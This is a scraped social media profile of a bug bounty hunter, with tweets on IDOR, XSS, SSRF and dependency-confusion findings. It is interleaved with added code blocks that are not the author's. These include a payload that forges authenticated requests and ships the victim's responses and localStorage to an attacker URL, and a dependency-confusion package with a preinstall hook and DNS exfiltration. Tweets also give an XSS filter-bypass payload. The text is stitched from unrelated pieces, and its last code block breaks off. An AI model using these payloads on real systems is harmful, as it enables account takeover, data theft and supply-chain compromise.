Moblig

@moblig_

Followers
6,937
Following
151
Media
65
Statuses
528

#1 Hacker at BugCon LHE Mexico 2021 & 2022 | Top Ranked in H1 Mexico Leaderboard 2021, 2022, 2023 | Offensive Security Engineer | Tweets are my own

127.0.0.1
Joined August 2021
Pinned Tweet
@moblig_
Moblig
2 years
Yay, I was awarded a $16,300 bounty on @Hacker0x01 ! #TogetherWeHitHarder 🎉🎉🎉 Tip: Even if an asset asks for authentication, fuzz for endpoints using ffuf, I found an unauthenticated API that allowed me to retrieve sensitive information!
42
91
1K
@moblig_
Moblig
1 year
$15k+ Worth of IDORs in the past couple of months; it takes a lot of manual verification, but use this regex in BurpSuite in order to filter out potential parameters: (?i)\b\w*id\b(?!\w)\s*=\s*("[^"]*"|'[^']*'|[^&\s}]*) #bugbountytips #CyberSecurity
34
358
1K
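The regex above, as an added example that is not the author's tooling: the PCRE `(?i)` becomes a JavaScript `i` flag, the pattern is run over a constructed proxy-history sample, and a second pass (my heuristic, not part of the tweet) drops the false positives such as `paid` and `valid` that the `\w*id` prefix inevitably pulls in. The sample lines are constructed for illustration.

```javascript
// Tweet's pattern, with a capture group added around the parameter name so hits can be reported by name.
// Matches `<something>id = value` where the value is quoted or runs to the next `&`, whitespace or `}`.
const ID_PARAM_RE = /\b(\w*id)\b(?!\w)\s*=\s*("[^"]*"|'[^']*'|[^&\s}]*)/gi;

// Constructed proxy-history lines (one request per line), not real traffic.
const SAMPLE_HISTORY = [
  "GET /api/v1/orders?order_id=813&paid=true&format=json HTTP/1.1",
  "POST /api/v1/teams/invite HTTP/1.1 team_id=42&invite_uid=7&valid=true",
  "GET /api/v1/profile?userID=5020&lang=en HTTP/1.1",
];

// First pass: every candidate the regex produces (what the Burp filter would show you).
function findIdParams(lines) {
  const hits = [];
  for (const line of lines) {
    for (const m of line.matchAll(ID_PARAM_RE)) {
      hits.push({ name: m[1], value: m[2].replace(/^["']|["']$/g, ""), line });
    }
  }
  return hits;
}

// Second pass (added heuristic): keep only names where "id" is a separate token.
function looksLikeIdentifier(name) {
  const lower = name.toLowerCase();
  if (["id", "uid", "uuid", "guid"].includes(lower)) return true;
  if (/_(?:u|uu|g)?id$/i.test(name)) return true;                  // snake_case: order_id, invite_uid
  if (/[a-z](?:Id|ID|Uid|UID|Uuid|UUID|Guid|GUID)$/.test(name)) return true; // camelCase: userId, userID
  return false;                                                      // paid, valid, android, ...
}

// What is worth the manual verification the tweet talks about.
function candidateIdParams(lines) {
  return findIdParams(lines).filter((h) => looksLikeIdentifier(h.name));
}
```

The raw pass returns six hits on the sample (two of them `paid` and `valid`); the filtered pass keeps `order_id`, `team_id`, `invite_uid` and `userID`. The heuristic only narrows the list; each survivor still has to be swapped for another user's value and checked by hand.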
@moblig_
Moblig
3 months
$10,000 for RCE through Dependency Confusion, this time on one of my first submissions in @intigriti 🙌 I spent a whole month learning and developing a custom tool using Next.js, this helped me identify and exploit the RCE. Of course, I also used:
37
73
704
@moblig_
Moblig
2 years
Yay, I was awarded a $10,000 bounty on @Hacker0x01 ! For a Critical Severity IDOR. Tip: 1) In-depth knowledge of the program, lots of manual testing 2) Learning to master the 'Autorize' extension for Burp Automated & manual testing🤝 #bugbountytip #hackerone
26
72
687
@moblig_
Moblig
2 years
Yay, I was awarded a $4,500 bounty on @Hacker0x01 ! Tip: Target had a /?back= parameter, but payloads like javascript://alert(1) did not work. Exploited using the following with URL-encoded ASCII tab characters: %09Jav%09ascript:alert(document.domain) #bugbountytips #bugbounty
19
141
654
@moblig_
Moblig
9 months
Some fun & unexpected bugs I found recently👇 1. Authentication Bypass by setting session cookie value to 'null' 2. Plain text credentials in JS files expose clients' PII Haven't found a write-up about the null cookie approach before, and the exposed credentials, just, wow...
21
100
627
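One mechanism that produces the `null` cookie bypass described above, as an added example that is not the author's finding (the tweet does not say how the target was implemented, so the mechanism is an assumption): the session cookie is JSON-parsed and then compared with loose equality, so a literal `null` matches every account that has no session token at all. The user store is constructed.

```javascript
// Constructed user store. The admin has never logged in, so it has no sessionToken field.
const USERS = [
  { id: 1, name: "admin", role: "admin" },
  { id: 2, name: "alice", role: "user", sessionToken: "s3cr3t-alice" },
];

function parseCookies(header) {
  const out = {};
  for (const part of (header || "").split(";")) {
    const [k, ...v] = part.trim().split("=");
    if (k) out[k] = v.join("=");
  }
  return out;
}

// Vulnerable: JSON.parse("null") yields null, and `undefined == null` is true,
// so the first account without a token is returned as the logged-in user.
function vulnerableAuth(cookieHeader) {
  const raw = parseCookies(cookieHeader).session;
  if (raw === undefined) return null;            // "no cookie at all" is the only case rejected
  let token;
  try { token = JSON.parse(raw); } catch { token = raw; }
  return USERS.find((u) => u.sessionToken == token) || null;
}

// Hardened: the token must be a non-empty string, the comparison is strict,
// and accounts that have no token can never match.
function hardenedAuth(cookieHeader) {
  const token = parseCookies(cookieHeader).session;
  if (typeof token !== "string" || token.length === 0) return null;
  return USERS.find((u) => typeof u.sessionToken === "string" && u.sessionToken === token) || null;
}
```

`Cookie: session=null` logs the vulnerable version in as `admin`; the hardened version rejects it while still accepting the real token. The same shape shows up with `undefined`, empty strings and `0`, which is why a session check should accept exactly one type and reject everything else.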
@moblig_
Moblig
1 year
I often find IDORs by searching in JS Files for interesting endpoints, but how do I automate this while also performing manual hunting?🤔 #bugbountytips I mostly use my custom @trick3st workflow for finding unique domains & secrets in JS files, here is how it works👇 1/4
15
148
586
@moblig_
Moblig
1 year
Yay, I was awarded a $10,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder #bugbountytip DOM XSS to Admin Account Takeover - No CORS policy so I was able to send authenticated requests on behalf of the victim and send the response back to my server. 👇
15
34
458
@moblig_
Moblig
2 years
$5,000 for 5 IDORS on the same asset! All manual findings, although for some of these I used the ‘Reflection’ extension in Burp in order to find more parameters vulnerable to IDOR #bugbountytips #hackerone
14
57
430
@moblig_
Moblig
4 months
Feels good to be back!🙌 Using this beauty again to bypass the fix for an XSS to ATO: %09Jav%09ascript:alert(1) #bugbountytips #togetherwehitharder #hackerone PS. If anyone is going to @defcon and wants to meet, I'll be in Vegas Aug 6-10! :) Attending @Hacker0x01 recharge too.
12
38
445
@moblig_
Moblig
28 days
Yay, I was awarded a $4,000 bounty on @Hacker0x01 ! For XSS to ATO Instead of a #bugbountytip , here is the code snippet used to check the user-supplied input in this specific parameter, who can tell me what the problem here was, and what a potential bypass would look like?
14
27
444
@moblig_
Moblig
1 year
I was awarded $7,666 for a Critical Reflected XSS, but no particular sensitive data was exposed. Here is how I was able to escalate to account takeover👇 #bugbountytips
17
74
418
@moblig_
Moblig
3 years
$4,000 for Bypassing WAF Tip: Whenever an asset is protected by a WAF, enumerate and investigate subdomains and IP Addresses, sometimes you’ll find dev or staging environments which are exact copies of production. -> WAF https://69.420.69.420:443 - No WAF
16
72
408
@moblig_
Moblig
2 years
Yay, I was awarded a $4,500 bounty on @Hacker0x01 ! XSS to ATO through exposed CSRF Tokens Tip: If cookies are HTTP only, search for exposed CSRF tokens, you can append them to your CSRF PoC: xhr.setRequestHeader("X-Csrf-Token", "3983xn9n"); #bugbountytips Read first comment👇
9
68
373
@moblig_
Moblig
3 years
Yay, I was awarded a $4,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder I think we all guessed what this was for, right?
6
20
352
@moblig_
Moblig
2 years
Yay, I was awarded a $4,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder For Reflected XSS to Account Takeover Tip: When cookies are HTTP only go for localStorage -- alert(JSON.stringify(localStorage));
5
47
301
@moblig_
Moblig
2 years
Yay, I was awarded a $2,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder This response time is literally every BugHunter's dream😮 Bug: IDOR by manually adding the parameter "user_id" to the JSON request #bugbountytips
11
18
275
@moblig_
Moblig
7 months
I know they were pissed after bypassing the fix for the third time lol Needless to say, they removed the asset from scope #bugbounty
15
12
268
@moblig_
Moblig
2 years
An API is calling your own records like this? -> GET /v1/transactions/all See if the response contains an object with an ID and reference it directly -> GET /v1/transactions/813 If you get a 200 OK, check if you can access any record ID for an IDOR! #bugbountytips
6
67
246
@moblig_
Moblig
2 years
Yay, I was awarded a $1,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder SSRF by appending /param?url= Access to internal resources but escalated to ATO by pointing the param to an XSS payload /param?url=
6
34
229
@moblig_
Moblig
2 years
Yay, I was awarded a $2,000 bounty on @Hacker0x01 ! Tip: If user IDs are predictable, try different features in the platform that expose user info, in my case I could add people to a team, therefore I could guess all user IDs with intruder and expose their info #bugbountytips
8
17
222
@moblig_
Moblig
2 years
Yay, I was awarded a $3,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder Blind XSS through Support Chat leads to ATO, forging requests on behalf of the victim using Fetch & sending the response to the attacker server (payload below👇🏻👇🏻👇🏻)
8
27
187
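The payload pattern behind this tweet and the related ones on this page (the DOM XSS with no CORS policy, the CSRF-token-in-header trick, the localStorage dump, and the later GraphQL thread), as an added example that is not the author's payload: a fetch sent as the victim with credentials, the exposed CSRF token appended as a header, and the response plus web storage shipped to an attacker-controlled URL. The transport is injected (`fetchImpl`, `exfil`) so the flow runs offline; in a real payload they are `window.fetch` and `navigator.sendBeacon` or `new Image().src`. The endpoint, header name, cookie and meta names, token value and attacker URL are assumptions.

```javascript
// Pull a CSRF token from a non-HttpOnly cookie or from the DOM (the author's follow-up says it was
// exposed in both places). Assumed names: a csrf_token cookie and a <meta name="csrf-token">.
function findCsrfToken(cookieString, html) {
  const c = /(?:^|;\s*)csrf[_-]?token=([^;]+)/i.exec(cookieString || "");
  if (c) return c[1];
  const m = /<meta\s+name=["']csrf-token["']\s+content=["']([^"']+)["']/i.exec(html || "");
  return m ? m[1] : null;
}

// Forge an authenticated request as the victim, then ship the response (and any storage) out.
async function forgeAndExfil({ endpoint, csrfToken, storage, fetchImpl, exfil, attackerUrl }) {
  const headers = { Accept: "application/json" };
  if (csrfToken) headers["X-Csrf-Token"] = csrfToken;   // tweet: append the exposed token when cookies are HttpOnly
  const res = await fetchImpl(endpoint, { method: "GET", credentials: "include", headers });
  const loot = {
    endpoint,
    status: res.status,
    body: await res.text(),
    storage: JSON.stringify(storage || {}),            // tweet: alert(JSON.stringify(localStorage)) to triage
  };
  await exfil(attackerUrl, JSON.stringify(loot));
  return loot;
}

// Constructed stand-in for the target origin and for the attacker's collector, so the flow runs offline.
// The mock only answers when the request carries the victim's cookies and the right CSRF header.
function makeMockBrowser() {
  const sent = [];
  const fetchImpl = async (url, init) => {
    const authed = init.credentials === "include" && init.headers["X-Csrf-Token"] === "3983xn9n";
    return {
      status: authed ? 200 : 403,
      text: async () => (authed ? '{"user":"victim","auth_token":"tok-victim-1"}' : '{"error":"forbidden"}'),
    };
  };
  const exfil = async (url, payload) => { sent.push({ url, payload }); };
  return { fetchImpl, exfil, sent };
}
```

Called from an XSS on the target origin (or from any origin when the API reflects `Access-Control-Allow-Origin` with credentials, which is the CORS misconfiguration the other tweets describe), the forged request rides the victim's HttpOnly cookies without ever reading them, which is the point of the technique. The defensive counterpart is to keep the CSRF token out of non-HttpOnly cookies and the DOM of attacker-reachable pages, and to never pair `Access-Control-Allow-Credentials: true` with a reflected origin.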
@moblig_
Moblig
3 years
Yay, I was awarded a $1,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder First time seeing an SSRF lead to an account takeover by itself, I might consider a writeup for this one because of its weird nature, also some kind words :)
7
6
181
@moblig_
Moblig
2 years
Why do you have to do me like that lol #bugbounty
9
11
176
@moblig_
Moblig
2 years
You can never have enough swag @Hacker0x01
2
4
149
@moblig_
Moblig
3 years
Yay, I was awarded a $2,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder First one of the year and last report regarding Log4j!
4
4
104
@moblig_
Moblig
14 days
One of the first critical bounties of my career was because of The Wayback Machine and the amazing resources they have and these idiots trying to take it down because of unrelated politics? Amazing👍🏻
@Sn_darkmeta
𝐒𝐍_𝐁𝐋𝐀𝐂𝐊𝐌𝐄𝐓𝐀
14 days
The Internet archive has and is suffering from a devastating attack We have been launching several highly successful attacks for five long hours and, to this moment, all their systems are completely down. second round | New attack 09/10/2024 Duration 6 hours
283
234
915
4
9
114
@moblig_
Moblig
2 years
From now on, please refer to me as Genius Hacker, thanks.
4
5
82
@moblig_
Moblig
8 months
You get a cute ‘Thank you’ note when reporting vulnerabilities to a company valued at 1.5 Trillion Dollars🥰 #bugbounty
6
2
87
@moblig_
Moblig
1 year
A quote from my 10k XSS report, this is why you have to use irrefutable facts when trying to demonstrate impact:
@samm0uda
Youssef Sammouda (sam0)
1 year
I got $66000 once for an XSS. The impact to the business and its users is the important thing in a report and not the bug itself.
17
24
511
2
6
80
@moblig_
Moblig
1 year
4) Build the payload using the GraphQL query: (payload doesn't fit in a tweet)
3
7
80
@moblig_
Moblig
1 year
@maxdha1 Filter Settings in Proxy Tab, or directly in the request analyzer
1
9
78
@moblig_
Moblig
2 years
6
14
72
@moblig_
Moblig
2 years
Getting a duplicate on @Hacker0x01 hurts, but getting a duplicate on a bug worth 10k is actually depressing😔 #bugbounty
5
0
68
@moblig_
Moblig
2 years
Well this was an interesting one🤔 $500 Bounty from the @mozilla Bug Bounty! Same tip as my last bounty, FFUF and keep updating your wordlists! I have no idea how to redeem this though lol #bugbountytips
7
5
64
@moblig_
Moblig
1 year
All that is left to do is analyze the results, and hopefully find exposed secrets & interesting endpoints to target for IDORs or other bugs! :) You can find the JSON for the workflow, which you can copy & paste into @trick3st UI here:
1
6
62
@moblig_
Moblig
2 years
Getting this message from a program is great, but getting a compliment from a triager hits different lol #bugbounty
5
1
58
@moblig_
Moblig
3 years
@bug_vs_me This is the part that applies to this specific scenario, taken from
3
9
58
@moblig_
Moblig
2 years
$1,500 for a vulnerability initially marked as “Not Applicable” by a triager, the tip today isn’t a technical one, but rather a piece of advice — Triagers do not have the last word, always ask for the client to be consulted and provide irrefutable evidence! #bugbountytips #bugbounty
@moblig_
Moblig
2 years
I just found and reported 3 vulnerabilities affecting the same product used by 3 different companies, 2 of them have been accepted as High on @Hacker0x01 and the 3rd marked as "Not Applicable" on Bugcrowd 😂This is why I never hack on Bugcrowd #bugbounty
4
1
48
3
3
56
@moblig_
Moblig
2 years
I just found and reported 3 vulnerabilities affecting the same product used by 3 different companies, 2 of them have been accepted as High on @Hacker0x01 and the 3rd marked as "Not Applicable" on Bugcrowd 😂This is why I never hack on Bugcrowd #bugbounty
4
1
48
@moblig_
Moblig
7 months
@bxmbn I still don't understand how people value their time so poorly that they are willing to work for free. Go do CTFs instead
5
0
48
@moblig_
Moblig
2 years
@Bhavinology 1. Single web app in scope so a lot of manual work and learning all the features 2. Once I find a vulnerable parameter I search for similar params using Reflected Parameters extension or with Logger using the regex: \?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])
2
9
46
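The Logger regex from the reply above, as an added example that is not the author's Burp setup: translated to JavaScript unchanged and run over constructed request lines, to show which parameter values it keeps (protocol-relative, absolute, URL-encoded and file-looking values, the ones worth retrying a redirect or file payload against) and which it ignores (plain numeric ids). The request lines are constructed.

```javascript
// The reply's pattern verbatim; group 1 is the value fragment that made the line match.
const URLISH_VALUE_RE = /\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])/;

// Constructed request lines, not real traffic.
const SAMPLE_REQUESTS = [
  "GET /login?back=//evil.example/x HTTP/1.1",          // protocol-relative URL in a parameter
  "GET /view?id=42&page=2 HTTP/1.1",                    // plain ids only: should not match
  "GET /dl?file=report.pdf&x=1 HTTP/1.1",               // file name: path traversal / LFI candidate
  "GET /go?next=https%3A%2F%2Fevil.example HTTP/1.1",   // URL-encoded absolute URL
];

// Returns each matching line with the fragment the alternation captured, so you can see
// which branch of the regex fired before deciding which payload family to try.
function findUrlLikeParams(lines) {
  const hits = [];
  for (const line of lines) {
    const m = URLISH_VALUE_RE.exec(line);
    if (m) hits.push({ line, fragment: m[1] });
  }
  return hits;
}
```

Three of the four sample lines match (`//evil`, `report.pdf&`, `https%3A%2F`); the `id=42&page=2` line does not. Note that `\?.*=` is greedy, so on a line with several parameters the engine backtracks from the last `=` and the fragment reported is whichever value matched first from the right, not necessarily the first parameter in the query string.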
@moblig_
Moblig
1 year
The PoC URL required an SID every time, so I had to create a Python script that would generate a new SID and append it to the PoC URL, the final payload looked like this (`<base64-encoded-code>`)); And the code used inside the atob function
2
0
45
@moblig_
Moblig
1 year
@0xuchiha_MRX Crawl using Burp + navigating web app manually, also use gau and filter out for URLs paths that only have query parameters, you can always find potential parameters there, if an ID is easily guessable try for IDOR
1
5
43
@moblig_
Moblig
2 years
In this case, the CSRF token was exposed through a non-HTTP cookie and also the DOM, they expired after 24 hours so plenty of time to abuse them. I was initially paid 625 for this report, and after review, I was given the rest of the 4,500
1
0
36
@moblig_
Moblig
3 years
Never thought I'd see the day... #Verified
1
0
34
@moblig_
Moblig
3 months
@ThisIsDK999 @intigriti Great question here! The main difference I found was not putting your payload directly in the preinstall parameter of your package.json, instead use 'node preinstall.json' and put your payload in the preinstall.json file, I also hex encoded the data and used DNS exfiltration
2
2
34
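The package shape the reply above describes (an install hook that runs a separate file rather than an inline command, hex-encoded data, DNS exfiltration), as an added example that is not the author's tool, together with the collector-side decoder and a defender-side audit. Assumptions: the hook script is a JavaScript file (the reply names it `preinstall.json`; a `.js` file is used here), the collector domain, the version number, and the internal package names in the audit. Nothing here resolves DNS; the hostnames are returned so the flow can be checked offline.

```javascript
// What a confusable package looks like on the public registry: the name of an internal package,
// a version higher than any internal one so the resolver prefers it, and an install-time hook that
// points at a file (the payload is not written into package.json itself).
function buildPackageJson(internalName, collectorDomain) {
  return {
    name: internalName,                                 // assumed internal name
    version: "99.0.0",                                  // outranks whatever the private registry holds
    scripts: { preinstall: "node preinstall.js" },      // hook runs the file, payload lives there
    description: "collector: " + collectorDomain,
  };
}

// Hex-encode arbitrary bytes and split them into DNS labels (max 63 chars each) under the collector
// domain; one hostname per chunk, prefixed with a sequence number so the collector can reorder.
function exfilHostnames(data, collectorDomain, labelLen = 60) {
  const hex = Buffer.from(data, "utf8").toString("hex");
  const names = [];
  for (let i = 0, seq = 0; i < hex.length; i += labelLen, seq++) {
    names.push(`${seq}.${hex.slice(i, i + labelLen)}.${collectorDomain}`);
  }
  return names;  // the real hook would resolve each name with require("node:dns").promises.resolve
}

// Collector side: strip the domain, order by sequence number, join and decode.
function decodeExfil(hostnames, collectorDomain) {
  const suffix = "." + collectorDomain;
  const chunks = hostnames
    .filter((h) => h.endsWith(suffix))
    .map((h) => h.slice(0, -suffix.length).split("."))
    .sort((a, b) => Number(a[0]) - Number(b[0]))
    .map(([, hex]) => hex);
  return Buffer.from(chunks.join(""), "hex").toString("utf8");
}

// Defender side. Run on a consumer's package.json to flag internal names that are not under a
// private scope (the confusable ones), and on any fetched package to flag install-time scripts.
function auditPackage(pkg, internalNames) {
  const findings = [];
  const deps = { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
  for (const name of Object.keys(deps)) {
    if (internalNames.includes(name) && !name.startsWith("@")) findings.push(`unscoped internal name: ${name}`);
  }
  for (const hook of ["preinstall", "install", "postinstall"]) {
    if (pkg.scripts && pkg.scripts[hook]) findings.push(`install-time script: ${hook} -> ${pkg.scripts[hook]}`);
  }
  return findings;
}
```

The two defender findings map to the two standard fixes: publish internal packages only under a scope you own (and pin that scope to the private registry), and install with `npm ci --ignore-scripts` in CI so a hook never runs unreviewed. Label length is capped at 60 so the sequence prefix and the domain still fit under the 253-byte hostname limit.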
@moblig_
Moblig
3 years
Nothing better than receiving personalized private invites! Makes you want to invest some extra effort on the program. @Hacker0x01
1
1
33
@moblig_
Moblig
3 months
Room view in Vegas @defcon
3
1
33
@moblig_
Moblig
1 year
The XSS could only retrieve non-HTTP cookies, so here is what I did: 1) I found a GraphQL endpoint (POST /graphql_service), that retrieved the user's auth token. So, how can I steal the token? 2) I tried transforming the POST query to a GET query in order to use it in my payload
2
1
28
@moblig_
Moblig
1 year
The second part grabs the results & searches JS files using getjs, the results are then passed to Cariddi which crawls the URLs & scans for endpoints, secrets, API keys, file extensions, tokens, and more. Linkfinder is used to extract endpoints & params from the JS files. 3/4
3
0
28
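The extraction step of the workflow described in this thread (what getjs, Cariddi and LinkFinder do for you), written by hand as an added example that is not the author's trick3st workflow: quoted endpoints in a JavaScript bundle, the query parameters next to them, hard-coded credentials (the "plain text credentials in JS files" case elsewhere on this page), and the paths that are built by concatenating an id and therefore go to the top of the IDOR list. The bundle snippet, key names and values are constructed.

```javascript
// Constructed bundle fragment, not from any real site.
const SAMPLE_BUNDLE = `
  const API = "https://api.example.test/v2";
  function team(id){ return fetch(API + "/teams/" + id + "/members?include=email"); }
  axios.get("/api/v1/users/" + uid + "/invoices.json");
  const cfg = { apiKey: "SAMPLE-KEY-0000", password: 'hunter2', theme: "dark" };
  window.open("/legacy/export?user_id=" + userId);
`;

// Quoted strings that look like absolute URLs or root-relative paths (LinkFinder-style, simplified).
const ENDPOINT_RE = /["'`](https?:\/\/[^"'`\s]+|\/[A-Za-z0-9_./?=&%-]+)["'`]/g;
// Hard-coded credentials: a key-ish name followed by a quoted literal.
const SECRET_RE = /\b(api[_-]?key|secret|token|password|passwd)\b\s*[:=]\s*["']([^"']+)["']/gi;

function extractEndpoints(js) {
  return [...js.matchAll(ENDPOINT_RE)].map((m) => m[1]);
}

// Parameter names that appear in the extracted endpoints (feed these to the id-parameter filter).
function extractParams(endpoints) {
  const params = new Set();
  for (const e of endpoints) {
    const q = e.split("?")[1];
    if (q) q.split("&").forEach((kv) => params.add(kv.split("=")[0]));
  }
  return [...params];
}

function extractSecrets(js) {
  return [...js.matchAll(SECRET_RE)].map((m) => ({ name: m[1], value: m[2] }));
}

// Paths immediately followed by `+ <something>id` in the source, plus endpoints that carry a *_id
// query parameter: the object reference is under the caller's control in both cases.
function idorCandidates(js) {
  const hits = new Set();
  for (const m of js.matchAll(/["']([^"']*\/)["']\s*\+\s*\w*(?:id|Id|ID)\b/g)) hits.add(m[1]);
  for (const e of extractEndpoints(js)) if (/[?&]\w*_id=/i.test(e)) hits.add(e);
  return [...hits];
}
```

On the sample this yields six endpoints, the parameters `include` and `user_id`, two credentials, and three IDOR candidates (`/teams/`, `/api/v1/users/`, `/legacy/export?user_id=`). Real bundles are minified, so run the same regexes over the beautified source, and treat every secret hit as unverified until you have tested it against the API it belongs to.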
@moblig_
Moblig
3 years
@Hacker0x01 Although the right move, it's also sad for the Russian bug hunters and companies who have to endure the consequences of their leader's decisions.
0
1
27
@moblig_
Moblig
2 months
Vegas was amazing!
1
0
27
@moblig_
Moblig
1 year
The first part does a thorough subdomain scan of the desired targets, using multiple sources like Github & Shodan and tools like subfinder, vita & assetfinder. It then goes deeper by performing level-deep subdomain scans with puredns 2/4
1
1
27
@moblig_
Moblig
1 year
I now have a working GET GraphQL query, but how can I expose the response that includes the auth token? 3) I found that the site also has a CORS misconfig, so I can send requests on behalf of the victim and receive the response on my server
2
1
26
@moblig_
Moblig
2 years
I’ll never understand why programs don’t fix Critical/P1 vulnerabilities for months, like, I’m tired of wasting hours investigating and exploiting vulnerabilities, writing a good report just to get a duplicate on Criticals🙄 #bugbounty
2
2
26
@moblig_
Moblig
7 months
Haven't seen a new Clear Verified program in a WHILE, yet new VDPs every month. Companies seem to prefer volume over quality now. Here is an interesting fact from H1 customers:
@bxmbn
🇪🇨🍫
7 months
More and more BBPs programs leaving/closing at a crazy rate New VDPs every month Almost 300 Reports in less than a week for this new VDP We are doomed.
33
15
230
2
2
24
@moblig_
Moblig
2 years
1st Place second year in a row in @Mercadolibre live hacking event! Thanks @BugCON 🥳 for the event! #bugbounty
3
5
22
@moblig_
Moblig
1 year
Completely wrong take, you are actually head hunted if you perform well in Bug Bounty. I've interviewed candidates who do well in Bug Bounty and they perform better than Certs collectors🤷🏻
@dccybersec
DC | David Lee
1 year
@sk1dd13 Been saying this for a while now dude. It's the most true statement ever. Some people think that bug bounties look great on a resume, but the truth is, recruiters don't give a flying shit about them. They don't consider it experience. Not my personal opinion. Just straight facts
13
1
20
3
2
23
@moblig_
Moblig
2 years
@heyAbdulsamad @Hacker0x01 If the default is a 200 page instead of a 404, you can use the -fs option to filter HTTP response size. Just look at the response size of that 200 page and use -fs 2456 for example
2
7
22
@moblig_
Moblig
7 months
@bxmbn They can not do that per their own platform standards
4
1
21
@moblig_
Moblig
3 years
Extra note: The 2 environments had bi-directional synchronization, so everything a user modified or posted on dev would immediately be reflected on prod and vice versa. So injecting a payload in dev would reflect on prod, but injecting a payload in prod was blocked by the WAF
2
0
20
@moblig_
Moblig
6 months
Pisses me off that programs can get away with this at @Hacker0x01 , what are they going to come up with next? Signing up for an account is considered High attack complexity?😂
@disclosedh1
publiclyDisclosed
6 months
Shipt disclosed a bug submitted by @DoomerOutrun : - Bounty: $3,900 #hackerone #bugbounty
4
4
48
2
0
19
@moblig_
Moblig
3 years
Yay, I was awarded a $800 bounty on @Hacker0x01 ! #TogetherWeHitHarder Second time I was able to leak an entire platform user base including PII. /users/5020 -> 403 Forbidden /users/5020.json -> 200 OK
1
3
19
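The two IDOR probes described on this page (pulling ids out of "all my records" and referencing them directly, as in the `/v1/transactions/813` tweet and the predictable-user-id tweet, and retrying a forbidden route with a format suffix, as in `/users/5020.json` above), as an added example that is not the author's tooling. They run against a constructed in-memory backend that has both flaws; `fetch` is a plain `(session, path) -> {status, body}` function so everything runs offline. Paths, ids and session names are assumptions.

```javascript
// Constructed backend. Flaw 1: /v1/transactions/<id> never checks ownership.
// Flaw 2: /users/<id> enforces authorization, but the .json variant of the same route does not.
const DB = {
  transactions: { 813: { owner: "alice", amount: 10 }, 814: { owner: "bob", amount: 20 } },
  users: { 5020: { owner: "bob", email: "bob@example.test" } },
};
function mockFetch(session, path) {
  let m;
  if (path === "/v1/transactions/all") {
    const mine = Object.entries(DB.transactions)
      .filter(([, r]) => r.owner === session)
      .map(([id, r]) => ({ id: Number(id), amount: r.amount }));
    return { status: 200, body: JSON.stringify({ data: mine }) };
  }
  if ((m = /^\/v1\/transactions\/(\d+)$/.exec(path))) {
    const r = DB.transactions[m[1]];
    return r ? { status: 200, body: JSON.stringify(r) } : { status: 404, body: "" };
  }
  if ((m = /^\/users\/(\d+)(\.json)?$/.exec(path))) {
    const r = DB.users[m[1]];
    if (!r) return { status: 404, body: "" };
    if (!m[2] && r.owner !== session) return { status: 403, body: "" };
    return { status: 200, body: JSON.stringify(r) };
  }
  return { status: 404, body: "" };
}

// Step 1: pull every id-like field out of the "all my records" response.
function collectIds(value, out = new Set()) {
  if (Array.isArray(value)) value.forEach((v) => collectIds(v, out));
  else if (value && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) {
      if (/^(?:id|\w+_id)$/i.test(k) && (typeof v === "number" || typeof v === "string")) out.add(v);
      else collectIds(v, out);
    }
  }
  return out;
}

// Step 2: reference records directly, including ids you were never shown, and every route variant.
function probeDirectAccess({ fetch, session, template, ids, variants = ["", ".json"] }) {
  const hits = [];
  for (const id of ids) {
    for (const v of variants) {
      const path = template.replace("{id}", String(id)) + v;
      const res = fetch(session, path);
      if (res.status === 200) hits.push({ id, path, body: res.body });
    }
  }
  return hits;
}

// Sequential ids are the usual tell, so probe a window around what the listing gave you.
function neighbourIds(ids, span = 2) {
  const out = new Set();
  for (const id of ids) for (let d = -span; d <= span; d++) out.add(Number(id) + d);
  return [...out];
}

// Report only what the session did not own: a 200 on someone else's record is the IDOR.
function findIdor({ fetch, session, listingPath, template, variants }) {
  const own = collectIds(JSON.parse(fetch(session, listingPath).body));
  const hits = probeDirectAccess({ fetch, session, template, ids: neighbourIds(own), variants });
  return hits.filter((h) => !own.has(h.id));
}
```

The transaction probe returns one hit, id 814 (bob's record, readable by alice); the user probe gets a 403 on `/users/5020` and a 200 on `/users/5020.json`. The fix is the same on both routes: resolve the record, then check that it belongs to the caller, before any serializer or format-specific handler runs.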
@moblig_
Moblig
2 years
I then escalated to Account Takeover
3
0
19
@moblig_
Moblig
2 years
I've gotten more duplicates this week than In my whole bug bounty career🫠 #bugbounty
0
0
16
@moblig_
Moblig
2 years
@gonzxph You can try different bypasses for internal assets like 127.1 instead of 127.0.0.1, also try URL shorteners that point to http://localhost, if none of those work, host an XSS payload which extracts localstorage and cookies, there is always juicy information there
0
1
15
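The two SSRF bypasses in the reply above (`127.1` for `127.0.0.1`, and a shortener that redirects to `localhost`), as an added example that is not the author's code: a blocklist that inspects the raw string, next to a check that parses the URL the way an HTTP client will and tests the numeric address, and a fetch wrapper that repeats that check on every redirect hop. The fetch transport is injected so it runs offline; hostnames and the address ranges are assumptions for the example.

```javascript
// Naive: reject only if the raw string contains the usual loopback spellings.
function vulnerableIsAllowed(rawUrl) {
  return !/127\.0\.0\.1|localhost|0\.0\.0\.0/i.test(rawUrl);
}

// Loopback, RFC 1918, link-local and "this network" ranges, on the canonical dotted form only.
function isPrivateIPv4(host) {
  const m = /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/.exec(host);
  if (!m) return false;
  const a = Number(m[1]), b = Number(m[2]);
  return a === 127 || a === 10 || a === 0 || (a === 172 && b >= 16 && b <= 31)
      || (a === 192 && b === 168) || (a === 169 && b === 254);
}

// The WHATWG URL parser (Node's URL follows it) normalises "127.1", "0x7f000001" and "2130706433"
// to "127.0.0.1" before the hostname is ever compared, which is exactly what the blocklist misses.
function isPrivateTarget(rawUrl) {
  let u;
  try { u = new URL(rawUrl); } catch { return true; }            // unparsable: treat as unsafe
  if (u.protocol !== "http:" && u.protocol !== "https:") return true;
  const host = u.hostname;
  return host === "localhost" || host.endsWith(".localhost") || host === "[::1]" || isPrivateIPv4(host);
}

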